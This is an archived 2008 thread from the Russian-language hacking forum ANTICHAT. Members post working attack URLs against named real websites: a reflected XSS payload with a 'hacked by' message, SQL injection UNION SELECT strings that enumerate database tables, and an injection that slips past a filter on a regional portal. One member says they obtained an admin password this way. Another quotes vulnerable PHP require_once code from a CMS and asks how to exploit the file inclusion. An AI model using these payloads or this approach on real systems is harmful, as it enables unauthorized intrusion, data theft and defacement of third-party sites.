ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.05.2008, 00:24
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
Sabe, а ты случайно админку не нашёл???))))
|
|
|
29.05.2008, 00:29
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Constantine
обновил пост. пасс получил этим способом)
пс: немножко подкурил..)
На100ящий
это я у тебя спрашиваю..) смысл взлома?)
Последний раз редактировалось sabe; 07.06.2008 в 22:09..
|
|
|
|
29.05.2008, 00:30
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
Constantine, спс за ссылку....будем знать!!!! всё, надо ложиться спать, а то завтра гос(((
|
|
|
|
29.05.2008, 00:32
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
Sabe, пока учимся....))))
|
|
|
|
29.05.2008, 00:35
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
ну я тоже пока учусь..)
хсс+
http://www.osvita-servis.com.ua/index.php?p=%22%3E%3Cscript%3Ealert(/hacked%20by%20VITAL/)%3C/script%3E
Последний раз редактировалось sabe; 29.05.2008 в 00:54..
|
|
|
|
29.05.2008, 00:53
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
/index.php?p=-1+union+select+1,2,unhex(hex(table_name))+from+INF ORMATION_SCHEMA.TABLES/*
или так
__________________
|
|
|
|
29.05.2008, 06:35
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659
Репутация:
34
|
|
ребята это инфо что то дает мне? есть толк от этой инфо?
http://www.bladeauction.com/
Последний раз редактировалось 1SeTh; 29.05.2008 в 06:38..
|
|
|
|
29.05.2008, 06:47
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
забей он просто упал)) как встанет почекаем на скуль..)
http://www.bladeauction.com/index.php
|
|
|
|
29.05.2008, 07:58
|
|
Новичок
Регистрация: 28.10.2006
Сообщений: 23
Провел на форуме:
125281
Репутация:
1
|
|
вот у мя тут созрел пост:
значит рассматривается cms wow-ultimate...
при запросе
http://site/index.php?name=...
если ввести в name каконить брет, типа (ghj) то выдается:
Fatal error: require_once() [function.require]: Failed opening required 'modules/ghj.php' (include_path='.;/usr/local/php5/PEAR') in Z:\home\site\www\templates\wolk\block-center.php on line 6
это говрит о том что при запросе подгружается модуль из папки "modules" ,выполняется подгрузка с помощью функции require_once() которая прописана в файле "Z:\home\site\www\templates\wolk\block-center.php"
block-center.php:
PHP код:
<?php
if (!$menu = &$_GET['page'])
$menu=$main_page;
print "<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
<td width=\"100%\" valign=\"top\" align=\"center\" >";
require_once("modules/$menu.php");
print "</td></tr></table>";
?>
из кода можно увидеть что модуль вызывается посредствам подстановки переменой "$menu" в функцию
PHP код:
require_once("modules/$menu.php")
терь собсно вапрос:
я читал что с помощью уязвимой функции require_once можно инклюдить php файлы с разными нихарошими кодами... можноли здесь чонить придумать :? |
|
|
|
29.05.2008, 11:34
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
Провел на форуме:
137918
Репутация:
56
|
|
Помогите раскрутить
Всем привет!
Помогите раскрутить:
http://www.e1.ru/wap/tv/index.php?p_id=107/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3/*
Похоже что есть apache security_mod, либо что-то самописное, не пропускает "FROM", сломал весь мозг 
PS:понадобится wml browser. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
